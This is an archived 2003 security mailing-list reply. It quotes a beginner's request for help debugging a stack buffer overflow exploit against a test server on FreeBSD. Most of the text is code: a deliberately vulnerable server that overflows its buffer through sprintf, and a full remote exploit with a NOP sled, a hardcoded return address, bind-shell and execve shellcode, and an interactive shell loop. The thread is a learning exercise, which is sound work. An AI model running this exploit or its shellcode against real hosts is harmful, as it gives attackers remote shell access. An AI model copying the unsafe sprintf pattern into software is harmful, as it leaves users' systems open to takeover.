Re: sample buffer overflow exploit problem
From: Ganbold (ganbold_at_micom.mng.net)
Date: 09/28/03
- Previous message: Ganbold: "Re: sample buffer overflow exploit problem"
- Maybe in reply to: Ganbold: "sample buffer overflow exploit problem"
- Next in thread: upb_at_email.ee: "Re: sample buffer overflow exploit problem"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 28 Sep 2003 14:56:02 +0900 To: <upb@email.ee>
Thanks, Yes, that's true, I can avoid string end null byte just as you said.
Is there any other problem in my code?
Ganbold
At 04:09 AM 9/28/2003 +0300, you wrote:
>Hi.
>
>I read your sample exploit code
> >//copying shellcode into buffer
> >memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
> >
> >// the previous statement causes a unintential Nullbyte at buffer[1000]
> >buffer[1000] = 0x90;
>
>You can avoid memcpy copying the string null terminator byte by simply
>decrementing the
>length to copy (3'rd paramter) by 1 like this:
>
>memcpy(buffer + 1001 - sizeof(shellcode) , shellcode, sizeof(shellcode) -
>1);
>
>
>----- Original Message -----
>From: "Ganbold" <ganbold@micom.mng.net>
>To: <vuln-dev@securityfocus.com>
>Sent: Saturday, September 27, 2003 10:54 AM
>Subject: sample buffer overflow exploit problem
>
>
> > Hi,
> >
> > I'm very new to buffer overflow exploit technics and my boss wants me to
> > thoroughly understand
> > how it works. I'm trying to exploit sample network server in FreeBSD 5.1
> > for this purpose.
> > When I try to exploit using execve /bin/sh (shellcode1), it works and
> > launches the shell in the remote machine.
> > However when I try to use port binding shell code, it binds shell to the
> > port, but when I try to connect to
> > it, it just closes the connection. Also I can't connect to bind port after
> > sending buffer using following code snippets:
> > ..............
> > printf("[-] Connecting to bindshell...\n");
> > remote.sin_family = AF_INET;
> > remote.sin_addr = *((struct in_addr *)host->h_addr);
> > remote.sin_port = htons(12345);
> > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> > {
> > close(s);
> > fprintf(stderr, "Error: connect\n");
> > return -1;
> > }
> > exec_sh(s);
> > ...............
> >
> > I appreciate if somebody give me some help to solve this test problem.
> > Is there anywhere I can find detailed explanation about buffer overflows
> > and working sample network exploits?
> > Is there anyway I can generate shellcodes in FreeBSD?
> >
> > I attached my sample server code and exploit code.
> >
> > thanks in advance,
> >
> > Ganbold Ts,
> >
> > senior programmer,
> > Micom Co., Ltd
> > Ulaanbaatar,
> > Mongolia
> >
> >
> >
> > Following is network server code:
> > --------------------------------------------------------------------------
>------------------------------------------------------
> > #include <stdio.h>
> > #include <netinet/in.h>
> > #include <netdb.h>
> > #include <sys/socket.h>
> > #include <sys/types.h>
> > #include <errno.h>
> >
> > #define BUFFER_SIZE 1024
> > #define NAME_SIZE 2048
> >
> > int handle(int c)
> > {
> > char buffer[BUFFER_SIZE], name[NAME_SIZE];
> > int bytes;
> > strcpy(buffer, "Your name?: ");
> > bytes = send(c, buffer, strlen(buffer), 0);
> > if (bytes == -1)
> > return -1;
> > bytes = recv(c, name, sizeof(name), 0);
> > if (bytes == -1)
> > return -1;
> > name[bytes - 1] = '\0';
> > sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
> > bytes = send(c, buffer, strlen(buffer), 0);
> > if (bytes == -1)
> > return -1;
> > return 0;
> > }
> >
> >
> > int main(int argc, char *argv[])
> > {
> > int s, c, cli_size;
> > struct sockaddr_in srv, cli;
> > if (argc != 2)
> > {
> > fprintf(stderr, "usage: %s port\n", argv[0]);
> > return 1;
> > }
> > s = socket(AF_INET, SOCK_STREAM, 0);
> > if (s == -1)
> > {
> > perror("socket() failed");
> > return 2;
> > }
> > srv.sin_addr.s_addr = INADDR_ANY;
> > srv.sin_port = htons( (unsigned short int) atol(argv[1]));
> > srv.sin_family = AF_INET;
> > if (bind(s, &srv, sizeof(srv)) == -1)
> > {
> > perror("bind() failed");
> > return 3;
> > }
> > if (listen(s, 3) == -1)
> > {
> > perror("listen() failed");
> > return 4;
> > }
> > for(;;)
> > {
> > c = accept(s, &cli, &cli_size);
> > if (c == -1)
> > {
> > perror("accept() failed");
> > return 5;
> > }
> > fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
> > if (handle(c) == -1)
> > fprintf(stderr, "%s: handle() failed", argv[0]);
> > close(c);
> > }
> > return 0;
> > }
> > --------------------------------------------------------------------------
>------------------------------------------------------
> >
> > Following is the sample exploit code:
> > --------------------------------------------------------------------------
>------------------------------------------------------
> > #include <stdio.h>
> > #include <netinet/in.h>
> > #include <netdb.h>
> > #include <sys/socket.h>
> > #include <sys/types.h>
> > #include <errno.h>
> > #include <unistd.h>
> >
> > /*
> > * FreeBSD shellcode - binds /bin/sh to a port 12345
> > *
> > * Claes M. Nyberg 20020619
> > *
> > * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
> > */
> > char shellcode[]
> > =
> > /* port _______*/
> > "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
> > "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
> > "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
> > "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
> > "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
> > "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
> > "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
> > "\x40\x50\x50\xcd\x80";
> >
> > /*
> > * FreeBSD shellcode - execve /bin/sh
> > *
> > * Claes M. Nyberg 20020120
> > *
> > * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
> > */
> > char shellcode1[] =
> > "\x31\xc0" /* xorl %eax, %eax */
> > "\x50" /* pushl %eax */
> > "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
> > "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
> > "\x89\xe3" /* movl %esp, %ebx */
> > "\x50" /* pushl %eax */
> > "\x53" /* pushl %ebx */
> > "\x89\xe2" /* movl %esp, %edx */
> > "\x50" /* pushl %eax */
> > "\x52" /* pushl %edx */
> > "\x53" /* pushl %ebx */
> > "\x50" /* pushl %eax */
> > "\xb0\x3b" /* movb $0x3b, %al */
> > "\xcd\x80" /* int $0x80 */
> > "\x31\xc0" /* xorl %eax, %eax */
> > "\x40" /* inc %eax */
> > "\x50" /* pushl %eax */
> > "\x50" /* pushl %eax */
> > "\xcd\x80"; /* int $0x80 */
> >
> > #define RET 0xbfbffa48
> >
> > int exec_sh(int sockfd)
> > {
> > char snd[4096],rcv[4096];
> > fd_set rset;
> > while(1)
> > {
> > FD_ZERO(&rset);
> > FD_SET(fileno(stdin),&rset);
> > FD_SET(sockfd,&rset);
> > select(255,&rset,NULL,NULL,NULL);
> > if(FD_ISSET(fileno(stdin),&rset))
> > {
> > memset(snd,0,sizeof(snd));
> > fgets(snd,sizeof(snd),stdin);
> > write(sockfd,snd,strlen(snd));
> > }
> > if(FD_ISSET(sockfd,&rset))
> > {
> > memset(rcv,0,sizeof(rcv));
> > if(read(sockfd,rcv,sizeof(rcv))<=0)
> > exit(0);
> > fputs(rcv,stdout);
> > }
> > }
> > }
> >
> > int main(int argc, char *argv[]) {
> >
> > char buffer[1064];
> > int s,t, i, size;
> > struct sockaddr_in remote;
> > struct hostent *host;
> >
> > if(argc != 3) {
> > printf("Usage: %s target-ip port\n", argv[0]);
> > return -1;
> > }
> >
> > // filling buffer with NOPs
> > memset(buffer, 0x90, 1064);
> >
> > //copying shellcode into buffer
> > memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
> >
> > // the previous statement causes a unintential Nullbyte at buffer[1000]
> > buffer[1000] = 0x90;
> >
> > // Copying the return address multiple times at the end of the buffer...
> > for(i=1022; i < 1059; i+=4) {
> > * ((int *) &buffer[i]) = RET;
> > }
> >
> > buffer[1063] = 0x0;
> >
> > //getting hostname
> >
> > host=gethostbyname(argv[1]);
> > if (host==NULL)
> > {
> > fprintf(stderr, "Unknown Host %s\n",argv[1]);
> > return -1;
> > }
> >
> > // creating socket...
> > s = socket(AF_INET, SOCK_STREAM, 0);
> > if (s < 0)
> > {
> > fprintf(stderr, "Error: Socket\n");
> > return -1;
> > }
> > remote.sin_family = AF_INET;
> > remote.sin_addr = *((struct in_addr *)host->h_addr);
> > remote.sin_port = htons(atoi(argv[2]));
> > // connecting with destination host
> > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> > {
> > close(s);
> > fprintf(stderr, "Error: connect\n");
> > return -1;
> > }
> > //sending exploit string
> > size = send(s, buffer, sizeof(buffer), 0);
> > if (size==-1)
> > {
> > close(s);
> > fprintf(stderr, "sending data failed\n");
> > return -1;
> > }
> > /*
> > printf("[-] Connecting to bindshell...\n");
> > remote.sin_family = AF_INET;
> > remote.sin_addr = *((struct in_addr *)host->h_addr);
> > remote.sin_port = htons(12345);
> > if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> > {
> > close(s);
> > fprintf(stderr, "Error: connect\n");
> > return -1;
> > }
> > exec_sh(s);
> > */
> > // closing socket
> > close(s);
> > }
> >
> > --------------------------------------------------------------------------
>------------------------------------------------------
> >
> >
> >
> >
- Previous message: Ganbold: "Re: sample buffer overflow exploit problem"
- Maybe in reply to: Ganbold: "sample buffer overflow exploit problem"
- Next in thread: upb_at_email.ee: "Re: sample buffer overflow exploit problem"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
